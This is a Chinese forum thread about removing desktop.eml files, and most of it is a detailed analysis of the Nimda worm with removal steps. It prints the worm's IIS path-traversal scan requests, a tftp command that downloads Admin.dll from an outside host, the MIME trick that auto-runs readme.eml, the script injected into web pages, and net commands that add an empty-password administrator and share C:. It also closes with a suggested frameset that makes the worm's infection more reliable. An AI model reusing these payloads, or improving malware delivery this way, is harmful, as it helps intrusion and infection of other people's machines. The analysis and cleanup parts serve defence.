desktop.eml病毒如何删除

我的机器内所有文件夹内都有一个.eml文件　　大部分叫desktop.eml    还有的叫_desktop.eml　删除后仍存在，瑞星杀不掉，请教:除重装系统外应如何处理???/

用超级奇警V3.3试试

建议用卡巴斯基　

用系统还原试试，不行就把系统还原关掉，然后在搜索中搜索那两个文件，全部删除。这个方法我原来用过还行，不知你的运气如何？

名称：Worm.Concept.57344 (Nimda/尼姆达)
类型：蠕虫/病毒
受影响的系统：Windows 95, Windows 98, Windows Me, Windows NT 4, Windows 2000
大小：57344字节


蠕虫文件：
[mmc.exe]
出现在windows文件夹，蠕虫扫描和创建tftpd的进程就是它。注意windows系统文件夹里也有一个mmc.exe，那不是Nimda。

[riched20.dll]
riched20.dll除了出现在windows系统文件夹里，还可能出现在任何有*.doc文件的文件夹里。因为它是winword.exe和wordpad.exe运行时都要调用的所以当打开DOC文件时就等于运行了Nimda。

[Admin.dll]
（Admin.dll除了在C:，D:，E:的根目录外还可出现在下面的"TFTP*****"出现的地方）

[load.exe]
出现在windows系统文件夹

[%temp%\readme*.exe]

[TFTP****]
形如TFTP3233。文件位置取决于使用tftp的目录。如果是"GET /scripts/root.exe?/c+tftp -i [localIP] GET Admin.dll HTTP/1.0"那么位置就在"Inetpub\scripts\"。如果是"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i [localIP] GET Admin.dll HTTP/1.0"那么位置就在"/scripts/..%c1%1c../"也就是根目录。

/*以上都是蠕虫文件的可执行程序，它们之间的区别只有文件名不同*/

[readme.eml]
这个东西是值得一提的，他利用了IE5（或者说OE5）的一个漏洞。我们知道html格式的邮件中图片和多媒体文件都是自动打开的，而可执行文件不是。但如果把可执行文件指定为多媒体类型，也会自动下载打开。下面是readme.eml的一段：
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
另外，如果文件夹是“按web页查看”，那么即使只是用鼠标单击选中readme.eml也会导致蠕虫的执行，如果把扩展名改为mht也是可以的，但改为htm就不行。

[readme.nws]
同readme.eml，只是出现的几率很小。

[*.exe]
可执行文件被感染，所以可能是任何文件名。

传播方式：

（一）通过email
在internet临时文件夹中读取所有"htm"，"html"文件并从中提取email地址，从信箱读取email并从中提取SMTP服务器，然后发送readme.eml。

（二）通过unicode_hole或CodeRedII建立的root.exe
unicode_hole我就不多说了，CodeRedII会在IIS的几个可执行目录下放置root.exe也是尽人皆知，Nimda首先在udp/69上启动一个tftp服务器,然后会作以下扫描
GET /scripts/root.exe?/c+dir HTTP/1.0
GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
一旦发现有弱点的系统就使用类似下面的命令
GET /scripts/root.exe?/c+tftp -i xxx.xxx.xxx.xxx GET Admin.dll HTTP/1.0
把文件传到主机上去，然后再GET /scripts/Admin.dll HTTP/1.0

（三）通过WWW服务
在所有文件名中包含default/index/main/readme并且扩展名为htm/html/asp的文件所在目录中创建readme.eml，并在文件末加上下面这一行<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
也就是说如果一台web服务器被感染了，那么大部分访问过此服务器的机器都会被感染。

（四）通过局域网
Nimda会搜索本地的共享目录中包含doc文件的目录，一但找到，就会把自身复制到目录中命名为riched20.dll（原理见前）

（五）以病毒的方式
搜索[SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths]寻找在远程主机上的可执行文件，一旦找到，Nimda就会以病毒的方式感染文件。有一点不同的是，它把原文件作为资源存储在新文件中，运行新文件时再当作可执行文件来调用。奇怪的是Nimda过滤了winzip32.exe，它不会感染winzip32.exe，可能是作者发现winzip染毒后不能正常运行吧。


确保运行：

病毒采取以下措施确保自己处于活跃状态
1）把自己复制到windows系统文件夹里命名为riched20.dll（原理见前）
2）把自己复制到windows系统文件夹里命名为load.exe，
修改system.ini把
shell=explorer.exe改为
shell=explorer.exe load.exe -dontrunold
使病毒在下次系统启动时运行。

创建后门：
1）Nimda打开的udp/69虽然目的并不是作后门，但的的确确是一个后门。
2）如果有足够权限将调用"net.exe"执行以下系统命令：
net user guest /add
net user guest /active
net user guest ""
net localgroup Administrators guest
net localgroup Guests guest /add
结果是空密码的guest加到了Administrators组中。
2）如果有足够权限将调用"net.exe"执行以下系统命令：
net share c$=c:\
删除[SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security]的所有子键,结果是C:\设为完全共享。


其它几个常见问题：

1)Nimda什么时候进入我国？
我手头最早的一行日志是：
2001-09-18 13:40:25 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+tftp%20-i%2061.133.3.126%20GET%20Admin.dll%20Admin.dll 502 -
也就是说肯定早于2001-09-18 13:40:25

2)Nimda的作者是谁？
程序的作者在程序中留下了以下标记：
fsdhqherwqi2001
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
可能对最终找出作者有帮助。

3)为什么说Nimda是“概念”蠕虫？
它可以通过至少五种方式传播
它是一个带exe扩展名的dll，可以做为可执行文件运行，也可作为dll运行。
它有智慧：当它名为Admin.dll被运行时，它会把自己复制到windows文件夹命名为mmc.exe并带上参数"-qusery9bnow"运行。
当它名为readme.exe被运行时，它会把自己复制到%temp%带上参数"-dontrunold"运行.
它会把自己的属性设为“系统”“隐藏”，再改写注册表，使“系统”“隐藏”属性的程序在资源管理器中不可见。
它是一个主机扫描器，一个弱点扫描器，一个后门程序；带有多个Exploit，掌握最新的安全信息；它就是一个黑客。

4）如何清除Nimda？
在文件夹选项里设置“显示所有文件”

删除mmc.exe/load.exe/riched20.dll/admin.dll/readme.eml/readme.exe等所有蠕虫文件。
检查所有大小为57344或79225的文件。
可以使用“查找”工具，搜索包含"fsdhqherwqi2001"的*.exe/*.dll和包含"Kz29vb29oWsrLPh4eisrPb09Pb2"的*.eml/*.nws。

检查system.ini。

检查所有文件名中包含default/index/main/readme并且扩展名为htm/html/asp的文件。

删除C:\的共享

最好再检查一下C:\和D:\有没有explorer.exe，除非确信一定没有感染CodeRedII。

重起系统

一点改进意见：

Nimda用JavaScript的"window.open"函数来打开readme.eml，这并不可靠，稍具安全常识的人都会调整IE的脚本支持
选项，有些人干脆关掉java，但是用下面这个方法就没问题了：
<frameset cols="0,*"><frame src="readme.eml">

板主说的太全面了.